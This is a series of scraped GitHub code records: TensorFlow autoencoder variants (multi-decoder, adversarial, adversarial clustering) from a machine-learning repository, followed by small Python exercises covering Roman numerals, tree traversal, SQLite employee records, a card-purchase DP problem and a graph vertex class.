self.m_dec_act_on_code = tf.keras.Model(self.m_dec.inputs, t_dec_act, name=\"act_dec_on_code\")\n self.m_dec_act = tf.keras.Model(\n self.m_enc.inputs, self.m_dec_act_on_code(self.m_enc(self.m_enc.inputs)), name=\"act_dec\"\n )\n\n # Concatenating both models gives us all activations\n t_all_act = tf.keras.layers.Concatenate()([\n self.m_enc_act(self.m_enc_act.inputs), self.m_dec_act(self.m_enc_act.inputs)\n ])\n self.m_all_act = tf.keras.Model(\n self.m_enc.inputs, t_all_act, name=\"act_all\"\n )\n\n @tf.function\n def call(self, inputs, training=False, mask=None):\n # Connect the encoder and decoder\n t_encoded = self.m_enc(inputs, training=training, mask=mask)\n t_decoded = self.m_dec(t_encoded, training=training, mask=mask)\n\n return t_decoded\n\n def get_config(self):\n config = {\n 'p_dropout': self.p_dropout,\n 'hidden_activation': self.hidden_activation,\n 'out_activation': self.out_activation,\n 'layer_dims': self.layer_dims,\n }\n\n base_config = super(Autoencoder, self).get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\n\nclass MultiAutoencoder(Autoencoder):\n def __init__(self, n_experts: int, **kwargs):\n super(MultiAutoencoder, self).__init__(**kwargs)\n\n # Save models\n self.m_decs = None\n\n # Save configuration\n self.n_experts = n_experts\n\n def build(self, input_shape):\n # We might get a list of tensorshapes - they should all be equal\n if isinstance(input_shape[0], tf.TensorShape):\n input_shape = input_shape[0]\n\n super(MultiAutoencoder, self).build(input_shape=input_shape)\n\n # Use multiple decoders\n m_decs = [tf.keras.models.clone_model(self.m_dec) for i_expert in range(self.n_experts)]\n # Rename for unique names\n for i_dec, cur_dec in enumerate(m_decs):\n cur_dec._name = f\"decoder-{i_dec}\"\n self.m_decs = m_decs\n\n # Create a helper model returning the output of all decoders\n t_enc_in = self.m_enc.inputs\n t_enc_out = self.m_enc(t_enc_in)\n t_decs_on_input = [m_dec(t_enc_out) for m_dec in m_decs]\n self.m_dec = tf.keras.Model(\n t_enc_in, t_decs_on_input, name=\"multi_output\"\n )\n\n # Return the activation for each decoder based on the code\n t_dec_in = m_decs[0].inputs\n # Create a helper with the very same input\n t_dec_act = {m_dec: tf.keras.layers.Concatenate()([\n tf.keras.layers.Flatten()(cur_layer.output) for cur_layer in m_dec.layers\n if isinstance(cur_layer, tf.keras.layers.Activation) or isinstance(cur_layer, tf.keras.layers.LeakyReLU)\n ]) for m_dec in m_decs}\n m_dec_act = [\n tf.keras.Model(m_dec.inputs, t_dec_act[m_dec]) for m_dec in m_decs\n ]\n m_dec_act_on_in = [cur_dec_act(t_dec_in) for cur_dec_act in m_dec_act]\n # Activation extractors\n self.m_dec_act_on_code = tf.keras.Model(t_dec_in, m_dec_act_on_in, name=\"act_dec_on_code\")\n self.m_dec_act = tf.keras.Model(\n self.m_enc.inputs, self.m_dec_act_on_code(self.m_enc(self.m_enc.inputs)), name=\"act_dec\"\n )\n\n # All activations are a little hard to interpret (flatten all decoder acts?) 
- let's keep them None for now\n self.m_all_act = None\n\n @tf.function\n def call(self, inputs, training=False, mask=None):\n\n # If we have a single input, convert it to a list\n if isinstance(inputs, tf.Tensor):\n inputs = [inputs]\n\n # Our MultiAutoencoder uses the very same encoder, but separate decoders\n t_encoded = [\n self.m_enc(inputs[i_expert], training=training, mask=mask) for i_expert in range(self.n_experts)\n ]\n t_decoded = [\n self.m_decs[i_expert](t_encoded[i_expert], training=training, mask=mask) for i_expert in range(self.n_experts)\n ]\n\n return t_decoded\n\n def get_config(self):\n config = {\n 'n_experts': self.n_experts\n }\n\n base_config = super(MultiAutoencoder, self).get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\n\nclass AdversarialAutoencoder(Autoencoder):\n def __init__(self, disc_dims: Tuple[int, ...] = (40, 30, 20, 10, 5), clipping_val: float = .01, **kwargs):\n # We'll always use leaky ReLUs for the encoder - the decoder's activations are determined by \"hidden_activation\"\n super(AdversarialAutoencoder, self).__init__(p_dropout=0.0, **kwargs)\n\n # Config\n self.disc_dims = disc_dims\n self.clipping_val = clipping_val\n\n # Models\n self.m_disc = None\n\n # Optimiser\n self.recon_opt = None\n self.disc_opt = None\n self.dec_opt = None\n\n def get_discriminator(self, input_shape, name=\"discriminator\"):\n # Construct a simple feed-forward network\n m_disc = tf.keras.Sequential(name=name)\n add_dense(\n m_disc, layer_dims=self.disc_dims, activation=self.hidden_activation, input_shape=input_shape[1:],\n p_dropout=self.p_dropout\n )\n m_disc.add(tf.keras.layers.Dense(1))\n return m_disc\n\n # We use leaky ReLUs as inspired by DCGAN\n def _conv_encoder(self, input_shape, code_dim=8):\n inputs = tf.keras.layers.Input(shape=input_shape[1:])\n\n x = tf.keras.layers.Conv2D(filters=32, kernel_size=3, strides=2, padding='same')(inputs)\n x = tf.keras.layers.BatchNormalization()(x)\n x = tf.keras.layers.LeakyReLU(.01)(x)\n\n x = tf.keras.layers.Conv2D(filters=16, kernel_size=3, strides=2, padding='same')(x)\n x = tf.keras.layers.BatchNormalization()(x)\n x = tf.keras.layers.LeakyReLU(.01)(x)\n\n x = tf.keras.layers.Conv2D(filters=8, kernel_size=3, strides=2, padding='same')(x)\n x = tf.keras.layers.BatchNormalization()(x)\n x = tf.keras.layers.LeakyReLU(.01)(x)\n\n z = tf.keras.layers.Conv2D(filters=code_dim if self.code_dim_override is None else self.code_dim_override, kernel_size=3, strides=2, padding='valid', name=\"code\")(x)\n\n model = tf.keras.Model(inputs=inputs, outputs=z, name=\"encoder\")\n return model\n\n def _conv_decoder(self, input_shape, output_dim):\n encoded = tf.keras.Input(shape=input_shape[1:])\n\n x = tf.keras.layers.Conv2DTranspose(filters=8, kernel_size=4, strides=2, padding='same')(encoded)\n x = tf.keras.layers.BatchNormalization()(x)\n x = tf.keras.layers.LeakyReLU(.01)(x)\n\n x = tf.keras.layers.Conv2DTranspose(filters=16, kernel_size=4, strides=2, padding='valid')(x)\n x = tf.keras.layers.BatchNormalization()(x)\n x = tf.keras.layers.LeakyReLU(.01)(x)\n\n x = tf.keras.layers.Conv2DTranspose(filters=32, kernel_size=4, strides=2, padding='valid')(x)\n x = tf.keras.layers.BatchNormalization()(x)\n x = tf.keras.layers.LeakyReLU(.01)(x)\n\n decoded = tf.keras.layers.Conv2DTranspose(filters=1, kernel_size=4, strides=2, padding='same', activation=self.out_activation)(x)\n decoder = tf.keras.Model(inputs=encoded, outputs=decoded, name=\"decoder\")\n return decoder\n\n def _dense_encoder(self, input_shape):\n model = 
tf.keras.Sequential(name=\"encoder\")\n\n add_dense(\n model, layer_dims=self.layer_dims[:-1], p_dropout=self.p_dropout,\n activation=\"leakyrelu\", input_shape=input_shape[1:], use_bias=self.use_bias,\n add_batch_norm=True\n )\n # We add the last layer manually to name it accordingly\n model.add(tf.keras.layers.Dense(self.layer_dims[-1], name=\"code\"))\n\n return model\n\n def _dense_decoder(self, input_shape, output_dim):\n model = tf.keras.Sequential(name=\"decoder\")\n\n add_dense(\n model, layer_dims=list(reversed(self.layer_dims[:-1])), p_dropout=self.p_dropout,\n activation=self.hidden_activation, input_shape=input_shape[1:]\n )\n # The last layer reconstructs the input\n model.add(tf.keras.layers.Dense(\n output_dim[-1], activation=self.out_activation\n ))\n\n return model\n\n @staticmethod\n def recon_loss(y_true, y_pred, loss_f=tf.keras.losses.BinaryCrossentropy(from_logits=False)):\n return loss_f(y_true=y_true, y_pred=y_pred)\n\n @staticmethod\n def disc_loss(y_real, y_fake, loss_f=tf.keras.losses.BinaryCrossentropy(from_logits=True)):\n # Real => 1\n # real_loss = loss_f(\n # # tf.random.normal(tf.shape(y_real), mean=1.0, stddev=0.01),\n # y_true=tf.ones_like(y_real),\n # y_pred=y_real\n # )\n real_loss = - tf.reduce_mean(y_real)\n\n # Fake => 0\n # fake_loss = loss_f(\n # # tf.random.normal(tf.shape(y_fake), mean=0.0, stddev=0.01),\n # y_true=tf.zeros_like(y_fake),\n # y_pred=y_fake\n # )\n fake_loss = tf.reduce_mean(y_fake)\n\n return real_loss + fake_loss\n\n @staticmethod\n def enc_loss(y_fake, loss_f=tf.keras.losses.BinaryCrossentropy(from_logits=True)):\n # Fake => Real = 1\n # fake_loss = loss_f(\n # # tf.random.normal(tf.shape(y_fake), mean=1.0, stddev=0.01),\n # y_true=tf.ones_like(y_fake),\n # y_pred=y_fake\n # )\n fake_loss = - tf.reduce_mean(y_fake)\n\n return fake_loss\n\n # == Keras functions ==\n def compile(self, learning_rate=.0001, **kwargs):\n super(AdversarialAutoencoder, self).compile(learning_rate=learning_rate, **kwargs)\n\n self.recon_opt = tf.keras.optimizers.Adam(learning_rate=learning_rate)\n self.disc_opt = tf.keras.optimizers.Adam(learning_rate=learning_rate)\n self.dec_opt = tf.keras.optimizers.Adam(learning_rate=learning_rate)\n\n def build(self, input_shape):\n super(AdversarialAutoencoder, self).build(input_shape)\n\n # Additionally, we need to build the discriminator\n self.m_disc = self.get_discriminator(tf.keras.layers.Flatten()(self.m_enc.output).shape)\n\n @tf.function\n def train_step(self, data):\n x_train = data[0]\n y_train = data[1]\n batch_size = x_train.shape[0]\n\n # 1) Overall AE should reconstruct the input samples\n with tf.GradientTape() as recon_tape:\n y_pred = self(x_train, training=True)\n recon_loss = self.recon_loss(y_true=x_train, y_pred=y_pred)\n\n recon_grad = recon_tape.gradient(recon_loss, self.m_enc.trainable_variables + self.m_dec.trainable_variables)\n self.recon_opt.apply_gradients(zip(recon_grad, self.m_enc.trainable_variables + self.m_dec.trainable_variables))\n\n # 2) Train the discriminator\n with tf.GradientTape() as disc_tape:\n # Get the code layer's reaction on the input\n t_code_x = self.m_enc(x_train, training=False)\n t_code_x = tf.keras.layers.Flatten()(t_code_x)\n t_code_noise = tf.random.normal(tf.shape(t_code_x))\n\n # Ask the discriminator what's real and what's fake\n t_disc_real = self.m_disc(t_code_noise, training=True)\n t_disc_fake = self.m_disc(t_code_x, training=True)\n\n disc_loss = self.disc_loss(y_real=t_disc_real, y_fake=t_disc_fake)\n\n disc_grad = disc_tape.gradient(disc_loss, 
self.m_disc.trainable_weights)\n if self.clipping_val:\n disc_grad, _ = tf.clip_by_global_norm(disc_grad, self.clipping_val)\n self.disc_opt.apply_gradients(zip(disc_grad, self.m_disc.trainable_weights))\n\n # 3) Train the encoder\n with tf.GradientTape() as dec_tape:\n # The code layer should look like \"real\" samples\n t_code_x = self.m_enc(x_train, training=True)\n t_code_x = tf.keras.layers.Flatten()(t_code_x)\n t_y_pred = self.m_disc(t_code_x, training=False)\n\n dec_loss = self.enc_loss(t_y_pred)\n\n dec_grad = dec_tape.gradient(dec_loss, self.m_enc.trainable_variables)\n if self.clipping_val:\n dec_grad, _ = tf.clip_by_global_norm(dec_grad, self.clipping_val)\n self.dec_opt.apply_gradients(zip(dec_grad, self.m_enc.trainable_variables))\n\n return {\n \"Reconstruction Loss\": recon_loss,\n \"Discriminator Loss\": disc_loss,\n \"Encoder Loss\": dec_loss\n }\n\n def call(self, inputs, training=None, mask=None):\n # Connect the encoder and decoder\n t_encoded = self.m_enc(inputs, training=training, mask=mask)\n t_decoded = self.m_dec(t_encoded, training=training, mask=mask)\n\n return t_decoded\n\n\nclass AdversarialClustering(AdversarialAutoencoder):\n def __init__(self, n_clusters: int = 5, **kwargs):\n super(AdversarialClustering, self).__init__(**kwargs)\n\n # Configuration\n self.n_clusters = n_clusters\n\n # We have another discriminator\n self.m_disc_cluster = None\n self.opt_disc_cluster = None\n\n def compile(self, learning_rate=.0001, **kwargs):\n # In our evaluation, the loss diverged for high learning rates: we'll lower it to 1e-5\n if learning_rate > 1e-5:\n learning_rate = 1e-5\n print(\"The learning rate for the AAE clustering model was lowered to 1e-5.\")\n\n super(AdversarialClustering, self).compile(learning_rate=learning_rate, **kwargs)\n\n self.opt_disc_cluster = tf.keras.optimizers.Adam(learning_rate=learning_rate)\n\n def build(self, input_shape):\n # This is on purpose: we need to adapt the building method of the AAE\n super(AdversarialAutoencoder, self).build(input_shape=input_shape)\n\n # Additionally, we need to build the discriminator\n self.m_disc = self.get_discriminator(tf.keras.layers.Flatten()(self.m_enc.output[0]).shape, name=\"code_disc\")\n self.m_disc_cluster = self.get_discriminator(tf.keras.layers.Flatten()(self.m_enc.output[1]).shape, name=\"cluster_disc\")\n\n def build_extractors(self):\n # Don't do anything here - this model is only for clustering\n pass\n\n def _dense_encoder(self, input_shape):\n\n # Up to the latent space it's the same as the usual AAE\n m_enc_pre = tf.keras.Sequential(name=\"encoder\")\n add_dense(\n m_enc_pre, layer_dims=self.layer_dims[:-1], p_dropout=self.p_dropout,\n activation=\"leakyrelu\", input_shape=input_shape[1:], use_bias=self.use_bias,\n add_batch_norm=True\n )\n\n # There are two outputs: the latent space and the clusters\n t_code = tf.keras.layers.Dense(self.layer_dims[-1], name=\"code\")(m_enc_pre.output)\n t_clust = tf.keras.layers.Dense(self.n_clusters, activation=\"softmax\", name=\"cluster\")(m_enc_pre.output)\n\n # Form one overall model\n m_enc = tf.keras.Model(\n m_enc_pre.inputs, [t_code, t_clust]\n )\n\n return m_enc\n\n def _dense_decoder(self, input_shape, output_dim):\n # We do have two inputs: concatenate them\n in_code = tf.keras.layers.Input(shape=input_shape[0][1:])\n in_clust = tf.keras.layers.Input(shape=input_shape[1][1:])\n in_tot = tf.keras.layers.Concatenate()([in_code, in_clust])\n\n # The rest is as in the basis AAE\n m_dec_post = tf.keras.Sequential(name=\"decoder_post\")\n 
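# mirror the encoder's hidden layers, now acting on the concatenated code + cluster input\n 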
add_dense(\n m_dec_post, layer_dims=list(reversed(self.layer_dims[:-1])), p_dropout=self.p_dropout,\n activation=self.hidden_activation, input_shape=in_tot.shape[1:],\n )\n # The last layer reconstructs the input\n m_dec_post.add(tf.keras.layers.Dense(\n output_dim[-1], activation=self.out_activation\n ))\n\n # Combine the multi-input with the original decoder\n m_dec = tf.keras.Model(\n [in_code, in_clust], m_dec_post(in_tot)\n )\n\n return m_dec\n\n # We use leaky ReLUs as inspired by DCGAN\n def _conv_encoder(self, input_shape, code_dim=16):\n inputs = tf.keras.layers.Input(shape=input_shape[1:])\n\n x = tf.keras.layers.Conv2D(filters=16, kernel_size=3, strides=2, padding='same')(inputs)\n x = tf.keras.layers.BatchNormalization()(x)\n x = tf.keras.layers.LeakyReLU(.01)(x)\n\n x = tf.keras.layers.Conv2D(filters=32, kernel_size=3, strides=2, padding='same')(x)\n x = tf.keras.layers.BatchNormalization()(x)\n x = tf.keras.layers.LeakyReLU(.01)(x)\n\n x = tf.keras.layers.Conv2D(filters=64, kernel_size=3, strides=2, padding='same')(x)\n x = tf.keras.layers.BatchNormalization()(x)\n x = tf.keras.layers.LeakyReLU(.01)(x)\n\n t_code = tf.keras.layers.Conv2D(filters=code_dim if self.code_dim_override is None else self.code_dim_override, kernel_size=3, strides=2, padding='valid', name=\"code\")(x)\n t_clust = tf.keras.layers.Conv2D(filters=self.n_clusters, kernel_size=3, strides=2, padding='valid', activation=\"softmax\", name=\"cluster\")(x)\n\n model = tf.keras.Model(inputs=inputs, outputs=[t_code, t_clust], name=\"encoder\")\n return model\n\n def _conv_decoder(self, input_shape, output_dim):\n in_code = tf.keras.Input(shape=input_shape[0][1:])\n in_clust = tf.keras.Input(shape=input_shape[1][1:])\n in_tot = tf.keras.layers.Concatenate()([in_code, in_clust])\n\n x = tf.keras.layers.Conv2DTranspose(filters=64, kernel_size=4, strides=2, padding='same', activation=self.hidden_activation)(in_tot)\n x = tf.keras.layers.Conv2DTranspose(filters=32, kernel_size=4, strides=2, padding='valid', activation=self.hidden_activation)(x)\n x = tf.keras.layers.Conv2DTranspose(filters=16, kernel_size=4, strides=2, padding='valid', activation=self.hidden_activation)(x)\n\n t_dec = tf.keras.layers.Conv2DTranspose(filters=1, kernel_size=4, strides=2, padding='same', activation=self.out_activation)(x)\n m_dec = tf.keras.Model(inputs=[in_code, in_clust], outputs=t_dec, name=\"decoder\")\n return m_dec\n\n def train_step(self, data):\n x_train = data[0]\n y_train = data[1]\n batch_size = tf.shape(x_train)[0]\n\n # 1) Overall AE should reconstruct the input samples\n with tf.GradientTape() as recon_tape:\n y_pred = self(x_train, training=True)\n recon_loss = self.recon_loss(y_true=x_train, y_pred=y_pred)\n\n recon_grad = recon_tape.gradient(recon_loss, self.m_enc.trainable_variables + self.m_dec.trainable_variables)\n self.recon_opt.apply_gradients(zip(recon_grad, self.m_enc.trainable_variables + self.m_dec.trainable_variables))\n\n # 2) Train the discriminators\n with tf.GradientTape() as disc_code_tape, tf.GradientTape() as disc_cluster_tape:\n # Get the code layer's reaction on the input\n t_code_x, t_cluster_x = self.m_enc(x_train, training=False)\n t_code_x = tf.keras.layers.Flatten()(t_code_x)\n t_cluster_x = tf.keras.layers.Flatten()(\n t_cluster_x\n )\n\n # Random distribution as comparison\n t_code_noise = tf.random.normal(tf.shape(t_code_x))\n t_cluster_noise = tf.one_hot(\n indices=tf.random.uniform((batch_size, ), minval=0, maxval=self.n_clusters, dtype=tf.int32),\n depth=self.n_clusters\n )\n\n # Ask the 
discriminator what's real and what's fake\n t_disc_code_real = self.m_disc(t_code_noise, training=True)\n t_disc_code_fake = self.m_disc(t_code_x, training=True)\n t_disc_cluster_real = self.m_disc_cluster(t_cluster_noise, training=True)\n t_disc_cluster_fake = self.m_disc_cluster(t_cluster_x, training=True)\n\n # Teach the discriminator to better distinguish between them\n disc_code_loss = self.disc_loss(y_real=t_disc_code_real, y_fake=t_disc_code_fake)\n disc_cluster_loss = self.disc_loss(y_real=t_disc_cluster_real, y_fake=t_disc_cluster_fake)\n\n # Calculate the gradients\n disc_code_grad = disc_code_tape.gradient(disc_code_loss, self.m_disc.trainable_weights)\n if self.clipping_val:\n disc_code_grad, _ = tf.clip_by_global_norm(disc_code_grad, self.clipping_val)\n disc_cluster_grad = disc_cluster_tape.gradient(disc_cluster_loss, self.m_disc_cluster.trainable_weights)\n if self.clipping_val:\n disc_cluster_grad, _ = tf.clip_by_global_norm(disc_cluster_grad, self.clipping_val)\n\n # And backpropagate them\n self.disc_opt.apply_gradients(zip(disc_code_grad, self.m_disc.trainable_weights))\n self.opt_disc_cluster.apply_gradients(zip(disc_cluster_grad, self.m_disc_cluster.trainable_weights))\n\n # 3) Train the encoder\n with tf.GradientTape() as dec_tape:\n # The code layer should look like \"real\" samples\n t_code_x, t_cluster_x = self.m_enc(x_train, training=True)\n t_code_x = tf.keras.layers.Flatten()(t_code_x)\n t_cluster_x = tf.keras.layers.Flatten()(\n t_cluster_x\n )\n\n t_code_pred = self.m_disc(t_code_x, training=False)\n t_cluster_pred = self.m_disc_cluster(t_cluster_x, training=False)\n\n dec_loss = self.enc_loss(t_code_pred) + self.enc_loss(t_cluster_pred)\n\n dec_grad = dec_tape.gradient(dec_loss, self.m_enc.trainable_variables)\n if self.clipping_val:\n dec_grad, _ = tf.clip_by_global_norm(dec_grad, self.clipping_val)\n self.dec_opt.apply_gradients(zip(dec_grad, self.m_enc.trainable_variables))\n\n return {\n \"Reconstruction Loss\": recon_loss,\n \"Discriminator Code Loss\": disc_code_loss,\n \"Discriminator Cluster Loss\": disc_cluster_loss,\n \"Encoder Loss\": dec_loss\n }\n","repo_name":"Fraunhofer-AISEC/ARGUE","sub_path":"libs/architecture/target.py","file_name":"target.py","file_ext":"py","file_size_in_byte":28766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17222721596","text":"# Problem found & solved on Leetcode: https://leetcode.com/problems/roman-to-integer/submissions/\n\nclass Solution(object):\n\tdef romanToInt(self, s):\n\t\t\"\"\"\n\t\t\tGiven a string of Roman numerals, uses two nested recursion functions to return\n\t\tthe equivalent in Arabic numberals.\n\n\t\t:type s: str\n\t\t:rtype: int\n\n\t\t>>> Solution.romanToInt(\"I\")\n\t\t1\n\n\t\t>>> Solution.romanToInt(\"CDXLIV\")\n\t\t444\n\n\t\t>>> Solution.romanToInt(\"xcix\")\n\t\t99\n\n\t\t>>> Solution.romanToInt(\"LMNOP\")\n\t\tValueError('Input is not a Roman numeral.')\n\n\t\t>>> Solution.romanToInt(777)\n\t\tValueError('777 is not a string.')\n\n\t\t\"\"\"\n\n\t\tromanDict = {\n\t\t\t\"I\": 1,\n\t\t\t\"IV\": 4,\n\t\t\t\"V\": 5,\n\t\t\t\"IX\": 9,\n\t\t\t\"X\": 10,\n\t\t\t\"XL\": 40,\n\t\t\t\"L\": 50,\n\t\t\t\"XC\": 90,\n\t\t\t\"C\": 100,\n\t\t\t\"CD\": 400,\n\t\t\t\"D\": 500,\n\t\t\t\"CM\": 900,\n\t\t\t\"M\": 1000\n\t\t}\n\n\n\t\tdef _romanToInt(string, result=[]):\n\t\t\t\"\"\"\n\t\t\t\"\"\"\n\n\t\t\tif not string:\n\t\t\t\treturn result\n\n\t\t\tif string[0] in romanDict:\n\t\t\t\tif string[:2] in romanDict:\n\t\t\t\t\tval = 
romanDict[string[:2]]\n\t\t\t\t\trest = string[2:]\n\t\t\t\telse:\n\t\t\t\t\tval = romanDict[string[0]]\n\t\t\t\t\trest = string[1:]\n\n\t\t\t\tresult.append(val)\n\t\t\t\treturn _romanToInt(rest, result)\n\n\t\t\telse:\n\t\t\t\traise ValueError('Input is not a Roman numeral.')\n\n\t\t\treturn result\n\n\n\t\tdef _addRecursively(lst, num=0):\n\t\t\t\"\"\"\n\t\t\t\tGiven a list of integers, returns the sum of the list.\n\n\t\t\t>>> _addRecursively([1, 2, 3], 0)\n\t\t\t6\n\n\t\t\t>>> _addRecursively([0], 0)\n\t\t\t0\n\n\t\t\t>>> _addRecursively([7, 6, 5, 4, 7, 8, 9], 0)\n\t\t\t46\n\n\t\t\t\"\"\"\n\n\t\t\tif not lst:\n\t\t\t\treturn num\n\n\t\t\tnum += lst[0]\n\t\t\treturn _addRecursively(lst[1:], num)\n\n\n\n\t\tif not isinstance(s, str):\n\t\t\traise ValueError(\"{} is not a string.\".format(s))\n\t\tfinalLst = list(_romanToInt(s.upper(), result=[]))\n\n\t\tfinalNum = _addRecursively(finalLst)\n\n\t\treturn finalNum\n\n\n","repo_name":"jennifro/practice-challenges","sub_path":"roman_to_integer.py","file_name":"roman_to_integer.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"45174519725","text":"class Traverse:\n def inorderTrav(self, root):\n self.res = []\n self.helpInorder(root)\n return self.res\n\n def helpInorder(self, root):\n if not root:\n return None\n self.helpInorder(root.left)\n self.res.append(root.val)\n self.helpInorder(root.right)\n\n def preOrderTrav(self, root):\n self.res = []\n self.helpPreorder(root)\n return self.res\n\n def helpPreorder(self, root):\n if not root:\n return None\n self.res.append(root.val)\n self.helpPreorder(root.left)\n self.helpPreorder(root.right)\n\n def postOrderTrav(self, root):\n self.res = []\n self.helpPostorder(root)\n return self.res\n\n def helpPostorder(self, root):\n if not root:\n return None\n self.helpPostorder(root.left)\n self.helpPostorder(root.right)\n self.res.append(root.val)","repo_name":"benben123/algorithm","sub_path":"myAlgorithm/py/BinaryTree/BinaryTreePrePostRecur.py","file_name":"BinaryTreePrePostRecur.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"45757717154","text":"import os\nimport sqlite3\n\n\ndef init_db():\n #connect to the existing database; if it does not exist, a new one is created.\n conn = sqlite3.connect('details.db')\n cursor = conn.cursor()\n print(\"Database created and opened successfully\")\n\n try:\n cursor.execute('''CREATE TABLE Dept\n (department TEXT PRIMARY KEY\n );''')\n\n print('Dept database created successfully')\n\n #insert Dept data\n cursor.execute(\"insert into Dept values ('Finance')\");\n cursor.execute(\"insert into Dept values ('Booking')\");\n cursor.execute(\"insert into Dept values ('Maintenance')\");\n cursor.execute(\"insert into Dept values ('Food')\");\n cursor.execute(\"insert into Dept values ('Product')\");\n cursor.execute(\"insert into Dept values ('Engineering')\");\n except:\n pass\n\n #create Employee table\n try:\n cursor.execute('''CREATE TABLE Employee\n (rowid INTEGER PRIMARY KEY AUTOINCREMENT,\n fname TEXT NOT NULL,\n lname TEXT,\n email TEXT NOT NULL,\n phone INT,\n salary INT,\n department TEXT,\n FOREIGN KEY (department)\n REFERENCES Dept(department));''')\n\n print('Employee database created successfully') \n\n\n #Insert data into Employee table\n cursor.execute(\"insert into Employee(fname, lname, email, phone, salary, department) values 
('Sivanandham', 'RM', 'siva1342001@gmail.com', 78675532768, 50000, 'Finance')\");\n cursor.execute(\"insert into Employee(fname, lname, email, phone, salary, department) values ('Sivaram', 'T', 'siva@gmail.com', 7861554268, 55000, 'Food')\");\n cursor.execute(\"insert into Employee(fname, lname, email, phone, salary, department) values ('rahul', 'RM', 'rahul@gmail.com', 78675532768, 50000, 'Finance')\");\n cursor.execute(\"insert into Employee(fname, lname, email, phone, salary, department) values ('harish', 'RM', 'harish@gmail.com', 78675532768, 50000, 'Product')\");\n\n except Exception as e:\n print(e)\n \n\n conn.commit()\n\n print(\"Records inserted successfully\")\n\n conn.close()\n\n\n#function to insert new user into Employee data\ndef new_user(fname, lname, email, phone, salary, department):\n\n conn = sqlite3.connect('details.db')\n cursor = conn.cursor()\n cursor.execute(\"insert into Employee(fname, lname, email, phone, salary, department) values(?, ?, ?, ?, ?, ?)\", (fname, lname, email, phone, salary, department))\n conn.commit()\n conn.close()\n\n\n#function to update the department value\ndef update_dept(e_id, newdept):\n\n conn = sqlite3.connect('details.db')\n cursor = conn.cursor()\n\n query = (\n '''UPDATE Employee \n SET department = ? \n WHERE rowid = ?''')\n\n cursor.execute(query, (newdept, e_id))\n conn.commit()\n conn.close()\n\n\n#function to delete the record in Employee table\ndef deleteuser(e_id):\n\n conn = sqlite3.connect('details.db')\n cursor = conn.cursor()\n\n query = \"delete from Employee where rowid = ?\"\n cursor.execute(query, (e_id,))\n conn.commit()\n conn.close()\n \n\n#function to read Employee table records\ndef get_employee_values():\n conn = sqlite3.connect('details.db')\n cursor = conn.cursor()\n cursor.execute('select * from Employee')\n \n\n row_headers = [x[0] for x in cursor.description] \n result = cursor.fetchall()\n json_data = []\n\n for res in result:\n res = list(res)\n json_data.append(dict(zip(row_headers, res)))\n\n conn.close()\n return json_data\n\n\n#function to read Dept table records\ndef get_dept_values():\n conn = sqlite3.connect('details.db')\n cursor = conn.cursor()\n cursor.execute('select * from Dept')\n\n row_headers = [x[0] for x in cursor.description] \n result = cursor.fetchall()\n json_data = []\n\n for res in result:\n res = list(res)\n json_data.append(dict(zip(row_headers, res)))\n\n conn.close()\n return json_data\n","repo_name":"SivanandhamRM/EmployeeDetail_webpage","sub_path":"sql_func.py","file_name":"sql_func.py","file_ext":"py","file_size_in_byte":3989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"16854385341","text":"# silver 1\n# BOJ 11052, Buying Cards (카드 구매하기)\nimport sys\n\nN = int(input())\n\ncard = list(map(int, sys.stdin.readline().rstrip().split()))\n\ndp = [0] * (N+1)\n\nfor i in range(N):\n dp[i+1] = card[i]\n\nfor i in range(2, N+1):\n for j in range(1, i//2 + 1):\n dp[i] = max(dp[i], dp[i-j] + dp[j])\n\nprint(dp[N])","repo_name":"Hwan9915/CodeJudge","sub_path":"BOJ/11052.py","file_name":"11052.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"11152701686","text":"# vertex.py\n# Emily Freebairn\n# November 17, 2011\n# Minor changes by THC.\n# The Vertex class represents a vertex in a graph. 
It stores the vertex's name,\n# location, and a list of the vertices that are adjacent to it.\n\nfrom cs1lib import *\n\nRADIUS = 8 # RADIUS of the drawn vertices\nLINE_WIDTH = 3 # line width of the drawn edges\nX_CORRECTION = 4 # horizontal correction amount to display names\nY_CORRECTION = 10 # vertical correction amount to display names\n\nclass Vertex:\n # Initialize a Vertex, given its location.\n def __init__(self, name, x, y):\n self.name = name # name of this vertex\n self.x = x # x location of the vertex in pixels\n self.y = y # y location of the vertex in pixels\n self.adjacent = [] # list of adjacent vertices\n \n # Return the information about this vertex as a string, including\n # the name of the vertex, its location, and a list of names of its\n # adjacent vertices.\n def __str__(self):\n string = self.name + \"; Location: \" + str(self.x) + \", \" + str(self.y) + \\\n \"; Adjacent vertices: \"\n for i in range(len(self.adjacent)-1):\n string += self.adjacent[i].name + \", \"\n string += self.adjacent[-1].name\n return string\n \n # Draw the vertex with the color parameters given.\n def draw(self, r, g, b):\n set_fill_color(r, g, b)\n disable_stroke()\n draw_circle(self.x, self.y, RADIUS)\n \n # Draw the edge between self and the vertex given as a parameter,\n # in the color determined by the parameters.\n def draw_edge(self, vertex, r, g, b):\n enable_stroke()\n set_stroke_width(LINE_WIDTH)\n set_stroke_color(r, g, b)\n draw_line(self.x, self.y, vertex.x, vertex.y)\n \n # Draw all the edges between a vertex and the vertices in its adjacency list,\n # in the color determined by the parameters.\n def draw_neighbor_edges(self, r, g, b):\n for adjacent_vertex in self.adjacent:\n self.draw_edge(adjacent_vertex, r, g, b)\n \n # Display this vertex's name in the color determined by the parameters.\n # (Extra-credit feature.)\n def show_name(self, r, g, b):\n enable_stroke()\n set_stroke_color(r, g, b)\n set_font_size(18)\n set_font_bold()\n text_width = get_text_width(self.name)\n draw_text(self.name, self.x - text_width/2 - X_CORRECTION,\n self.y - Y_CORRECTION)\n \n # Determine whether the point (x, y) is in the box inscribing the vertex's circle.\n def is_point_near_vertex(self, x, y):\n return abs(self.x - x) <= RADIUS and abs(self.y - y) <= 